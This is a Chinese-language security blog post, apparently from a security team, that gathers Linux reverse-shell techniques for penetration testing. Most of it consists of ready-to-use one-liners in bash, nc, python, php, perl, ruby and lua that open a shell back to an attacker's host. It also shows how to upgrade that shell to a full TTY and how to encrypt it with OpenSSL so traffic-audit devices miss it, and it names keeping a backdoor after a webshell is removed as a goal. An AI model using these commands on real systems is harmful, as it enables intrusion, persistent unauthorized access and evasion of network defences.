linux反弹shell知识汇总

  • A+
所属分类:安全文章

linux反弹shell知识汇总

什么是shell

shell是渗透中常用的名词,像getshell,webshell,反弹shell等等,都和shell相关。

百度百科解释的shell:

在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界

面”的软件(命令解析器)。它类似于DOS下的command.com和后来的

cmd.exe。它接收用户命令,然后调用相应的应用程序。

简单说用户通过壳访问操作系统内核的服务,也就是由壳到内核,执行系统命令。

getshell:获取到目标的命令执行权限

webshell:指网站后门,通过web服务进行命令执行

反弹shell:把命令行的输入输出转移到其它主机

为什么要反弹shell

1、webshell下执行命令不交互,为了方便提权或其它操作必须要反弹shell。
2、反弹shell相当于新增一个后门,当webshell被发现删除后权限不会丢失。

用linux反弹shell的方式

使用whereis命令去确定目标支持的反弹方法。

 whereis nc bash python php exec lua perl ruby

linux反弹shell知识汇总

bash反弹shell

bash反弹是实战中用的最多的方法

nc -lvp 9999
bash -i >& /dev/tcp/ip/port 0>&1

把命令拆开分析:
1、bash -i代表在本地打开一个bash
2、/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接
3、>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程vps
4、远程vps开启对应的端口去监听,就会接收到这个bash的标准输出和标准错误输出。

nc反弹shell

需要目标主机安装了nc

nc ip port -e /bin/sh

使用其他版本的 nc

nc.traditional ip port -e /bin/sh

linux反弹shell知识汇总

配合命名管道进行反弹:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f


linux反弹shell知识汇总
linux反弹shell知识汇总

python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

linux反弹shell知识汇总
linux反弹shell知识汇总
首先使用socket与远程建立起连接,接下来使用到了os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方法有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关闭fd2,然后将fd1代表的那个文件强行复制给fd2,在这里可以把fd1和fd2看作是C语言里的指针,将fd1赋值给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这里也就是建立socket连接返回的文件描述符,打印出来数值为3
linux反弹shell知识汇总
0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程
接下来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。

php反弹shell

需要php关闭safe_mode选项,才可以使用exec函数。
使用php的exec函数执行方法1反弹shell的命令

php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'

使用php的fsockopen去反弹shell

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

其它反弹方法

exec反弹

0<&196;exec 196<>/dev/tcp/ip/port; sh <&196 >&196 2>&196

perl反弹

perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby反弹

ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

lua反弹

lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"

获取一个完全交互shell

通过上述命令反弹shell得到的shell并不能称为完全交互的shell,通常称之为'哑'shell。
通常存在以下缺点

  • ctrl-c会中断会话
  • 无法正常使用vim等文本编辑器
  • 没有向上箭头使用历史
  • 无法执行交互式命令
  • 无法查看错误输出
  • 无法使用 tab 命令补全
  • 无法操控jobcontrol


因此有必要去获取一个完全交互的shell。
1、在shell 中执行python,使用pty模块,创建一个原生的终端,命令如下:

python -c 'import pty; pty.spawn("/bin/bash")'


隐藏linux反弹shell知识汇总
运行完后
2、键入 Ctrl-Z暂停任务,切回到 VPS 的命令行中;在 VPS 中执行:

stty raw -echo     
fg         #将后台运行或挂起的任务切换到前台运行


linux反弹shell知识汇总
3、在 shell 中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。

reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104


linux反弹shell知识汇总

SSL流量加密

部分防护设备会对内外网传输流量进行审查,反弹shell执行命令都是以明文进行传输的,很容易被查杀。
因此需要将原始流量使用 openssl 加密,绕过流量审计设备。
linux反弹shell知识汇总
1、首先vps上生成SSL证书的公钥/私钥对,信息懒得填,一直回车即可。

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes


linux反弹shell知识汇总
2、vps使用 OpenSSL 监听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888


linux反弹shell知识汇总
3、目标主机执行反弹加密shell

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s

linux反弹shell知识汇总
反弹成功,成功接收到ssl流量加密的shell。
linux反弹shell知识汇总

参考链接

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.sohu.com/a/161766202_709042
https://www.freebuf.com/vuls/211847.html
https://www.freebuf.com/articles/system/178150.html
https://zhuanlan.zhihu.com/p/138393396
https://www.cnblogs.com/Dubing-ydfc/p/11749241.html


E


N


D








Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。

linux反弹shell知识汇总


linux反弹shell知识汇总我知道你在看

linux反弹shell知识汇总

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: